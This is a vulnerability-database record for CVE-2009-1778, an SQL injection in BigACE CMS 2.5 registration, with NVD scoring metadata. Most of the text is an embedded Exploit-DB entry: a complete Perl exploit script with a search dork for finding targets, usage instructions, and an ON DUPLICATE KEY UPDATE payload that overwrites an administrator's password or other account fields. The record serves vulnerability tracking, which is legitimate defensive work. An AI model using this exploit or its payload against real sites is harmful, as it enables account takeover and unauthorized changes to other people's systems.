ID CVE-2009-1778Type cveReporter cve@mitre.orgModified 2018-10-10T19:38:00
Description
SQL injection vulnerability in the new user registration feature in BigACE CMS 2.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
{"id": "CVE-2009-1778", "bulletinFamily": "NVD", "title": "CVE-2009-1778", "description": "SQL injection vulnerability in the new user registration feature in BigACE CMS 2.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.", "published": "2009-05-22T20:30:00", "modified": "2018-10-10T19:38:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1778", "reporter": "cve@mitre.org", "references": ["http://www.bigace.de/BIGACE-2.6.html", "http://www.securityfocus.com/bid/34920", "https://www.exploit-db.com/exploits/8664", "http://secunia.com/advisories/35063", "http://www.securityfocus.com/archive/1/503448/100/0/threaded", "http://www.bigace.de/Security-Fix-for-2.5.html"], "cvelist": ["CVE-2009-1778"], "type": "cve", "lastseen": "2019-05-29T18:09:58", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "4d242a831248cda0133c83ad4c08d1a8"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "ea4b1291a18837da19cda0245e5907a9"}, {"key": "cpe23", "hash": "fc88099eebfc21faebc0712e225ec112"}, {"key": "cvelist", "hash": "32749f609d0ff91765d7fa68e536fc96"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "805c5c751007648306c308e497e20dab"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "2e83b146f0aeeea6e3e721830aee0e5d"}, {"key": "href", "hash": "39eaadf4d68287ea57a44c3c39ce1619"}, {"key": "modified", "hash": "ca1835d06e7b7aa962e31aa218ce7742"}, {"key": "published", "hash": "eb353a1f3cc45ba5c66e916687798c08"}, {"key": "references", "hash": "ad875bcf2aeb872e74fbed2c94a3cc5c"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a158ebc82d806784448fd9aa6efdddfd"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "eb13d07cc22964b0819ec136b718fb9ad1872d772bd569c5eb10d16e5c9d971b", "viewCount": 0, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2019-05-29T18:09:58"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:8664"]}], "modified": "2019-05-29T18:09:58"}, "vulnersScore": 7.4}, "objectVersion": "1.3", "cpe": ["cpe:/a:bigace:bigace_cms:2.5"], "affectedSoftware": [{"name": "bigace bigace_cms", "operator": "eq", "version": "2.5"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:bigace:bigace_cms:2.5:*:*:*:*:*:*:*"], "cwe": ["CWE-89"]}
{"exploitdb": [{"lastseen": "2016-02-01T07:52:45", "bulletinFamily": "exploit", "description": "BIGACE CMS 2.5 (username) Remote SQL Injection Exploit. CVE-2009-1778. Webapps exploit for php platform", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "id": "EDB-ID:8664", "href": "https://www.exploit-db.com/exploits/8664/", "type": "exploitdb", "title": "BIGACE CMS 2.5 username Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/perl\n#***********************************************************************************************\n#***********************************************************************************************\n#**\t \t\t\t\t\t\t\t\t\t\t **\n#** \t\t\t\t\t\t\t\t\t\t\t **\n#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **\n#** || || || [] [][] [] [] [] [] [] [] [] []\t [] [] **\n# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **\n#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\\ \n#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--\n#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ \n# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] \n#**\t\t\t\t\t\t\t **\n#** \t\t\t\t\t\t\t\t\t\t\t **\n#** \u00c2\u00a1VIVA SPAIN!...\u00c2\u00a1GANAREMOS EL MUNDIAL!...o.O **\n#**\t\t\t\t\t \u00c2\u00a1PROUD TO BE SPANISH!\t **\n#**\t\t\t\t\t\t\t\t\t\t\t **\n#***********************************************************************************************\n#***********************************************************************************************\n#\n#----------------------------------------------------------------------------------------------\n#| (Post Form --> User register (username)) User options changer (SQLi) EXPLOIT\t |\n#|--------------------------------------------------------------------------------------------|\n#| | Bigace CMS -stable release- 2.5 |\t\t |\n#| CMS INFORMATION: --------------------------------------\t\t\t |\n#|\t\t\t\t\t\t\t\t\t\t |\n#|-->WEB: http://www.bigace.de/\t\t\t \t\t \t\t |\n#|-->DOWNLOAD: http://downloads.sourceforge.net/bigace/\t\t\t\t |\n#|-->DEMO: http://www.bigace.de/demo.html\t\t\t\t\t\t |\n#|-->CATEGORY: CMS / Blogging\t\t\t\t\t\t\t\t |\n#|-->DESCRIPTION: BIGACE is an easy-to-use multisite, multilanguage and multiuser |\n#| \t\tWeb CMS, written for PHP/MySQL.Uses FCKeditor for HTML editing...\t |\n#|-->RELEASED: 2009-04-27\t\t\t\t\t\t\t\t |\n#|\t\t\t\t\t\t\t\t\t\t\t |\n#| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\n#|\t\t\t\t\t\t\t\t\t\t\t |\n#|-->TESTED ON: firefox 3 \t\t\t\t |\n#|-->DORK: \"Powered by BIGACE 2.5\"\t\t\t\t\t\t\t |\n#|-->CATEGORY: USER OPTIONS CHANGER/ SQL INJECTION/ PERL EXPLOIT\t\t\t |\n#|-->AFFECT VERSION: LAST = 2.5 (Maybe <= ?)\t\t \t\t\t |\n#|-->Discovered Bug date: 2009-04-27\t\t\t\t\t\t\t |\n#|-->Reported Bug date: 2009-04-27\t\t\t\t\t\t\t |\n#|-->Fixed bug date: 2009-05-04\t\t\t\t\t\t\t\t |\n#|-->Info patch (2.6): http://www.bigace.de/BIGACE-2.6.html\t\t\t\t |\n#|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\n#|-->mail: y3nh4ck3r[at]gmail[dot]com\t\t\t\t\t\t\t |\n#|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\n#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\n#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)\t\t |\n#----------------------------------------------------------------------------------------------\n#\n#------------\n#CONDITIONS:\n#------------\n#\n#**gpc_magic_quotes=off\n#\n#-----------------\n#PRE-REQUIREMENTS\n#-----------------\n#\n#Package --> allow.self.registration --> True (Default value)\n#\n#-------\n#NEED:\n#-------\n#\n#**valid username\n#\n#**real captcha code/img\n#\n#**maybe PHPSESSID (with securimage captcha plugin)\n#\n#---------------------------------------\n#PROOF OF CONCEPT (SQL INJECTION):\n#---------------------------------------\n#\n#Register module (username option) is vuln to sql injection.\n#\n#Username --> Proof of concept','password','thisisthelanguage')%23\n#\n#Other parameters --> something\n#\n#\n#---------------------------------------\n#EXPLOIT (SQL INJECTION):\n#---------------------------------------\n#\n#If you find a valid username, it can use --> \"ON DUPLICATE KEY UPDATE column=value\",\n#\n#this clause updates the previous row if a unique index is affected (username) and\n#\n#doesn't insert a new row. So (username=admin --> valid user):\n#\n#Username --> admin','any','any') ON DUPLICATE KEY UPDATE password=MD5(12345)%23\n#\n#Other parameters --> something\n#\n#If username=admin exists then, his password is changed to 12345!\n#\n#---------------------------------------\n#INSTRUCTIONS:\n#---------------------------------------\n#\n#Go to vuln web --> user register\n#\n#Copy the captcha image name/sid:\n#\n#For example --> b2evo_captcha_e24cf14f6a03283413dfb7133624a39e --> Use the b2evo captcha!\n#\n#For example --> ead9c0aa4822c265b346c67390b7235d --> Use the securimage captcha!\n#\n#Copy the captcha text. For example --> WEGKA\n#\n#Search a valid user. For example --> admin\n#\n#Choose a column. Possibilities: id,cid,email,username,password,language or active.\n#\n#Introduce a value for this column.\n#\n#If captcha uses securimage also you need PHPSESSID to exploit. \n#\n#Launch the exploit!\n#\n#Note: If username isn't valid, ie, he doesn't exist then, a new invalid user is inserted.\n#\n#\n#######################################################################\n#######################################################################\n##*******************************************************************##\n## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##\n##*******************************************************************##\n##-------------------------------------------------------------------##\n##*******************************************************************##\n## GREETZ TO: JosS, Ulises2k and all SPANISH Hack3Rs community! ##\n##*******************************************************************##\n#######################################################################\n#######################################################################\n#\nuse LWP::UserAgent;\nuse HTTP::Request;\n use Digest::MD5 qw(md5_hex);\n#Subroutines\nsub lw\n{\n\tmy $SO = $^O;\n\tmy $linux = \"\";\n\tif (index(lc($SO),\"win\")!=-1){\n\t\t$linux=\"0\";\n\t}else{\n\t\t$linux=\"1\";\n\t}\t\t\n\tif($linux){\n\t\tsystem(\"clear\");\n\t}\n\telse{\n\t\tsystem(\"cls\");\n\t\tsystem (\"title BIGACE CMS 2.5 (User Options changer) Exploit\");\n\t\tsystem (\"color 02\");\n\t}\n}\nsub request {\n\tmy $userag = LWP::UserAgent->new;\n\t$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\n\tmy $request = HTTP::Request -> new(POST => $_[0]);\n\tif($_[2] == 1){\n\t#Securimage needs PHPSESSID\n\t$request->header(cookie => \"PHPSESSID=\".$_[3]);\n\t}\n\t#I need referer for captcha\n\t$request->referer($_[0]);\n\t$request->content_type('application/x-www-form-urlencoded');\n\t$request->content($_[1]); \n\tmy $outcode= $userag->request($request)->as_string;\n\treturn $outcode;\n}\nsub error {\nprint \"\\t------------------------------------------------------------\\n\";\n\tprint \"\\tWeb isn't vulnerable!\\n\\n\";\n\tprint \"\\t--->Maybe:\\n\\n\";\n\tprint \"\\t\\t1.-Patched or magic_quotes_gpc=ON.\\n\";\n\tprint \"\\t\\t2.-User doesn't exist.\\n\";\n\tprint \"\\t\\t3.-Error in captcha code or image.\\n\";\n\tprint \"\\t\\t4.-Column doesn't exist.\\n\";\n\tprint \"\\t\\t5.-Bad path or host.\\n\";\n\tprint \"\\t\\t6.-Repeat captcha with option 1 (securimage).\\n\\n\";\n\tprint \"\\t\\tEXPLOIT FAILED!\\n\";\n\tprint \"\\t------------------------------------------------------------\\n\";\n}\nsub helper {\n\tprint \"\\n\\t[!!!] BIGACE-CMS--stable-release-2.5-->(User Options) Exploit\\n\";\n\tprint \"\\t[!!!] USAGE MODE: [!!!]\\n\";\n\tprint \"\\t[!!!] perl $0 [HOST] [PATH] [Type Captcha] [Captcha/ssid img] [Captcha code] [Column] [Value] [User]\\n\";\n\tprint \"\\t[!!!] [HOST]: Web.\\n\";\n\tprint \"\\t[!!!] [PATH]: Home Path.\\n\";\n\tprint \"\\t[!!!] [Type Captcha]: B2Evo --> 0. Securimage --> 1. Default: 0\\n\";\n\tprint \"\\t[!!!] [Captcha/ssid img]: Img captcha name (0) or Img ssid name (1).\\n\";\n\tprint \"\\t[!!!] [Captcha code]: Captcha text.\\n\";\n\tprint \"\\t[!!!] [Column]: email,active(0/1),username,password,id,cid or language\\n\";\n\tprint \"\\t[!!!] [Value]: Set changed value\\n\";\n\tprint \"\\t[!!!] [User]: Username to change\\n\";\n\tprint \"\\t[!!!] [PHPSESSID]: Securimage needs PHPSESSID.\\n\";\n\tprint \"\\t[!!!] Example-1: perl $0 'www.example.es' 'bigace' '0' 'b2evo_captcha_ed5c10cb69be1ee9340b3743c8718fe2'\\n\";\n print \"\\t[!!!] 'EWZ3L' 'password' '12345' 'admin'\\n\"; \n\tprint \"\\t[!!!] Example-2: perl $0 'www.example.es' 'bigace' '1' '6f15b93e170f5f5e50922361b06d228d'\\n\";\n print \"\\t[!!!] 'EWZ3' 'password' '12345' 'admin' 'u3h7on9taiihpbm51roeqqq2q2'\\n\"; \n\tprint \"\\t[!!!] Note: If option 0 is available you can use this captcha code to change more options!\\n\\n\";\n}\n#Main\n&lw;\nprint \"\\t#######################################################\\n\\n\";\nprint \"\\t#######################################################\\n\\n\";\nprint \"\\t## BIGACE CMS 2.5 - (User Options changer) Exploit ##\\n\\n\";\nprint \"\\t## ++Conditions: magic_quotes=off ##\\n\\n\";\nprint \"\\t## ++Needed: Username to change ##\\n\\n\";\nprint \"\\t## ++Needed: Valid captcha img/code ##\\n\\n\";\nprint \"\\t## Author: Y3nh4ck3r ##\\n\\n\";\nprint \"\\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\\n\\n\";\nprint \"\\t## Proud to be Spanish! ##\\n\\n\";\nprint \"\\t#######################################################\\n\\n\";\nprint \"\\t#######################################################\\n\\n\";\n#Init variables\nmy $host=$ARGV[0];\nmy $path=$ARGV[1];\nmy $img=$ARGV[3];\nmy $code=$ARGV[4];\nmy $columns=$ARGV[5];\nmy $values=$ARGV[6];\nmy $username=$ARGV[7];\nif(($ARGV[2]==0) || ($ARGV[2]==1)){\n\t$option=$ARGV[2];\n\t$numArgs = $#ARGV + 1;\n\tif($numArgs<=7) \n\t{\n\t\t&helper;\n\t\texit(1);\t\n\t}\n}else{\n\t$option=0;\n\t$numArgs = $#ARGV + 1;\n\tif($numArgs<=6) \n\t{\n\t\t&helper;\n\t\texit(1);\t\n\t}\n}\nif($columns eq \"password\"){\n\t$values=md5_hex($values); #pass in md5\n}\n#Build the uri\nmy $finalhost=\"http://\".$host.\"/\".$path.\"/index.php?cmd=application&id=-1_tauth_kregister_len\";\n#Check all variables needed\n#sql injection\t\n$injection=$username.\"','any','any') ON DUPLICATE KEY UPDATE \".$columns.\"='\".$values.\"'%23\";\n#build posts with injection\nif($option==0){\n$post=\"register=do&validate=http://\".$host.\"/\".$path.\"/addon/b2evo/b2evo_captcha_tmp/\".$img.\".jpg&username=\";\n$PHPSESSID=\"nothing\";\n}else{\n$post=\"register=do&validate=http://\".$host.\"/\".$path.\"/addon/securimage/show_captcha.php?sid=\".$img.\"&username=\";\n$PHPSESSID=$ARGV[8];\n}\n$post.=$injection.\"&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=\".$code.\"&sumbit=Create\";\n$output=&request($finalhost, $post, $option, $PHPSESSID);\n#processed\nif($output!~(/Title: 404 Not Found/))\n{\n\tif ($output!~(/\\<div align=\\\"center\\\" id=\\\"registerError\\\"\\>/))\n\t{ \n\t\tprint \"\\n\\t---------------------------------------------------------------\\n\";\n\t\tprint \"\\t-- EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer) --\\n\";\n\t\tprint \"\\t---------------------------------------------------------------\\n\\n\";\n\t\tprint \"\\t\\tUser option changed!\\n\\n\";\n\t\tprint \"\\t\\tOption changed: \".$columns.\"\\n\";\n\t\tprint \"\\t\\tNew value: \".$values.\"\\n\\n\";\n\t\tprint \"\\t\\tIf username isn't real, you add a new inconsistent active user!\\n\\n\";\n\t\tprint \"\\t\\tNote: If option 0 is available you can use this captcha code\\n\";\n\t\tprint \"\\t\\tto change more options!\\n\\n\";\n\t\tprint \"\\n\\t<<<<<<----------------------FINISH!---------------->>>>>>>>\\n\\n\";\n\t\tprint \"\\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\\n\\n\";\n\t\tprint \"\\t<<<<<<-----------------------EOF-------------------->>>>>>>\\n\\n\";\n\t}else{\n\t&error;\n\t}\n}else{\n\t&error;\n}\nexit(1);\n#Ok...all job done\n\n# milw0rm.com [2009-05-12]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8664/"}]}
